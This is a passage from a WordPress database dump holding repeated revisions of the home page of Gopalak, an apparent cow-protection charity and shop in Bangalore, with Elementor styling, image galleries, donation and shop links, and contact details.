/></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:14:55','2022-10-20 10:44:55','',1373,'https://gopalak.in/?p=1918',0,'revision','',0),(1919,1,'2022-10-20 16:14:56','2022-10-20 10:44:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:14:56','2022-10-20 10:44:56','',1373,'https://gopalak.in/?p=1919',0,'revision','',0),(1921,1,'2022-10-20 16:21:38','2022-10-20 10:51:38','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:21:38','2022-10-20 10:51:38','',1373,'https://gopalak.in/?p=1921',0,'revision','',0),(1922,1,'2022-10-20 16:21:38','2022-10-20 10:51:38','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:21:38','2022-10-20 10:51:38','',1373,'https://gopalak.in/?p=1922',0,'revision','',0),(1923,1,'2022-10-20 16:21:39','2022-10-20 